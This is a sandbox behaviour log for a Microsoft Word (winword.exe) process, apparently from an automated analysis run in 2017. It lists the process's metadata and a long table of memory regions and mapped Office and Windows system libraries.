# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Dec 15 2017 17:49:06 # Log Creation Date: 20.12.2017 14:26:29.564 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\office15\\winword.exe" page_root = "0x7f1e6740" os_pid = "0x95c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 138 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 139 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 140 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 141 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 142 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" 
filename = "" Region: id = 143 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 144 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 145 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 146 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 147 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 148 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 149 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 150 start_va = 0x3f0000 end_va = 0x420fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 151 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 152 start_va = 0x440000 end_va = 0x441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 153 start_va = 0x450000 end_va = 0x459fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 154 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 155 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" 
Region: id = 156 start_va = 0x4b0000 end_va = 0x4b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 157 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 158 start_va = 0x4d0000 end_va = 0x4d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 159 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 160 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 161 start_va = 0x610000 end_va = 0x6eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 162 start_va = 0x6f0000 end_va = 0x6f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 163 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 164 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 165 start_va = 0x740000 end_va = 0x740fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 166 start_va = 0x760000 end_va = 0x760fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 167 start_va = 0x770000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 168 start_va = 0x790000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 169 start_va = 0x890000 end_va = 0x890fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 170 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 171 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 172 start_va = 0x8c0000 end_va = 0x8c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 173 start_va = 0x8d0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 174 start_va = 0x9d0000 end_va = 0xdc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 175 start_va = 0xdd0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 176 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 177 start_va = 0xf00000 end_va = 0xf00fff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 178 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 179 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 180 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 181 start_va = 0xf60000 end_va = 0xf61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 182 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000f70000" filename = "" Region: id = 183 start_va = 0xf80000 end_va = 0x1156fff entry_point = 0xf80000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office15\\winword.exe") Region: id = 184 start_va = 0x1160000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 185 start_va = 0x1d60000 end_va = 0x202efff entry_point = 0x1d60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 186 start_va = 0x2030000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 187 start_va = 0x20b0000 end_va = 0x20effff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 188 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 189 start_va = 0x2100000 end_va = 0x2100fff entry_point = 0x2100000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 190 start_va = 0x2110000 end_va = 0x2110fff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 191 start_va = 0x2130000 end_va = 0x2130fff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 192 start_va = 0x2150000 end_va = 0x2150fff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 193 start_va = 0x2170000 end_va = 0x2170fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" 
Region: id = 194 start_va = 0x21b0000 end_va = 0x21b0fff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 195 start_va = 0x21e0000 end_va = 0x21e0fff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 196 start_va = 0x2210000 end_va = 0x2234fff entry_point = 0x2210000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 197 start_va = 0x2240000 end_va = 0x2240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 198 start_va = 0x2250000 end_va = 0x2260fff entry_point = 0x2250000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 199 start_va = 0x2290000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 200 start_va = 0x23b0000 end_va = 0x23cefff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 201 start_va = 0x23d0000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 202 start_va = 0x24d0000 end_va = 0x24d0fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 203 start_va = 0x24e0000 end_va = 0x24e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 204 start_va = 0x24f0000 end_va = 0x25effff entry_point = 0x0 region_type = private 
name = "private_0x00000000024f0000" filename = "" Region: id = 205 start_va = 0x25f0000 end_va = 0x266efff entry_point = 0x25f0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 206 start_va = 0x26a0000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 207 start_va = 0x26e0000 end_va = 0x2adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026e0000" filename = "" Region: id = 208 start_va = 0x2ae0000 end_va = 0x340ffff entry_point = 0x2ae0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 209 start_va = 0x3410000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 210 start_va = 0x3530000 end_va = 0x356ffff entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 211 start_va = 0x35d0000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 212 start_va = 0x35e0000 end_va = 0x36dffff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 213 start_va = 0x3740000 end_va = 0x374ffff entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 214 start_va = 0x3790000 end_va = 0x379ffff entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 215 start_va = 0x37a0000 end_va = 0x3803fff entry_point = 0x37a0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 216 start_va = 0x3850000 end_va = 0x394ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000003850000" filename = "" Region: id = 217 start_va = 0x3990000 end_va = 0x399ffff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 218 start_va = 0x39a0000 end_va = 0x419ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 219 start_va = 0x41b0000 end_va = 0x42affff entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 220 start_va = 0x42b0000 end_va = 0x436ffff entry_point = 0x42b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 221 start_va = 0x43d0000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 222 start_va = 0x4540000 end_va = 0x463ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 223 start_va = 0x4690000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 224 start_va = 0x4790000 end_va = 0x4b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 225 start_va = 0x4cc0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 226 start_va = 0x4e70000 end_va = 0x4eaffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 227 start_va = 0x50a0000 end_va = 0x50dffff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 228 start_va = 0x50e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 229 start_va = 0x54e0000 end_va = 
0x56dffff entry_point = 0x0 region_type = private name = "private_0x00000000054e0000" filename = "" Region: id = 230 start_va = 0x56e0000 end_va = 0x5adffff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 231 start_va = 0x5ae0000 end_va = 0x62dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ae0000" filename = "" Region: id = 232 start_va = 0x62e0000 end_va = 0x66e0fff entry_point = 0x0 region_type = private name = "private_0x00000000062e0000" filename = "" Region: id = 233 start_va = 0x66f0000 end_va = 0x6af0fff entry_point = 0x0 region_type = private name = "private_0x00000000066f0000" filename = "" Region: id = 234 start_va = 0x6b00000 end_va = 0x6f00fff entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 235 start_va = 0x6f10000 end_va = 0x710ffff entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 236 start_va = 0x7110000 end_va = 0x75cffff entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 237 start_va = 0x75d0000 end_va = 0x79cffff entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 238 start_va = 0x79d0000 end_va = 0x81cffff entry_point = 0x0 region_type = private name = "private_0x00000000079d0000" filename = "" Region: id = 239 start_va = 0x36620000 end_va = 0x3662ffff entry_point = 0x0 region_type = private name = "private_0x0000000036620000" filename = "" Region: id = 240 start_va = 0x63a10000 end_va = 0x63b9dfff entry_point = 0x63a10000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 241 start_va = 0x63ba0000 end_va = 0x63c54fff entry_point = 0x63ba0000 region_type = mapped_file 
name = "adal.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 242 start_va = 0x63c60000 end_va = 0x63cd9fff entry_point = 0x63c60000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 243 start_va = 0x63db0000 end_va = 0x63eb9fff entry_point = 0x63db0000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 244 start_va = 0x63ec0000 end_va = 0x63febfff entry_point = 0x63ec0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 245 start_va = 0x63ff0000 end_va = 0x68cdafff entry_point = 0x63ff0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 246 start_va = 0x68ce0000 end_va = 0x6a5c3fff entry_point = 0x68ce0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 247 start_va = 0x6a5d0000 end_va = 0x6ba8bfff entry_point = 0x6a5d0000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\wwlib.dll") Region: id = 248 start_va = 0x6baf0000 end_va = 0x6bb72fff entry_point = 0x6baf0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: 
"c:\\windows\\system32\\d3d11.dll") Region: id = 249 start_va = 0x6bb80000 end_va = 0x6bc95fff entry_point = 0x6bb80000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll") Region: id = 250 start_va = 0x6bca0000 end_va = 0x6c010fff entry_point = 0x6bca0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 251 start_va = 0x6c020000 end_va = 0x6c0dffff entry_point = 0x6c020000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll") Region: id = 252 start_va = 0x6c0e0000 end_va = 0x6c199fff entry_point = 0x6c0e0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 253 start_va = 0x6c1a0000 end_va = 0x6cf47fff entry_point = 0x6c1a0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\oart.dll") Region: id = 254 start_va = 0x6e980000 end_va = 0x6e9c9fff entry_point = 0x6e980000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 255 start_va = 0x6eed0000 end_va = 0x6ef20fff entry_point = 0x6eed0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 256 start_va = 0x6f220000 end_va = 0x6f24cfff entry_point = 0x6f220000 region_type = mapped_file name = 
"osppc.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 257 start_va = 0x6f2f0000 end_va = 0x6f304fff entry_point = 0x6f2f0000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msohev.dll") Region: id = 258 start_va = 0x6fc30000 end_va = 0x6fd87fff entry_point = 0x6fc30000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 259 start_va = 0x707d0000 end_va = 0x70ccffff entry_point = 0x707d0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 260 start_va = 0x70cd0000 end_va = 0x70f0ffff entry_point = 0x70cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 261 start_va = 0x70f40000 end_va = 0x70fa8fff entry_point = 0x70f40000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 262 start_va = 0x70fb0000 end_va = 0x7106efff entry_point = 0x70fb0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 263 start_va = 0x713e0000 end_va = 0x71462fff entry_point = 0x713e0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 264 start_va = 0x71470000 end_va = 
0x714a9fff entry_point = 0x71470000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 265 start_va = 0x714b0000 end_va = 0x714dbfff entry_point = 0x714b0000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 266 start_va = 0x716a0000 end_va = 0x716eefff entry_point = 0x716a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 267 start_va = 0x716f0000 end_va = 0x71747fff entry_point = 0x716f0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 268 start_va = 0x71b10000 end_va = 0x71b14fff entry_point = 0x71b10000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 269 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 270 start_va = 0x73a80000 end_va = 0x73a8cfff entry_point = 0x73a80000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 271 start_va = 0x73aa0000 end_va = 0x73b9afff entry_point = 0x73aa0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 272 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: 
"c:\\windows\\system32\\dwmapi.dll") Region: id = 273 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 274 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 275 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 276 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 277 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 278 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 279 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 280 
start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 281 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 282 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 283 start_va = 0x75060000 end_va = 0x75088fff entry_point = 0x75060000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 284 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 285 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 286 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 287 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 288 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" 
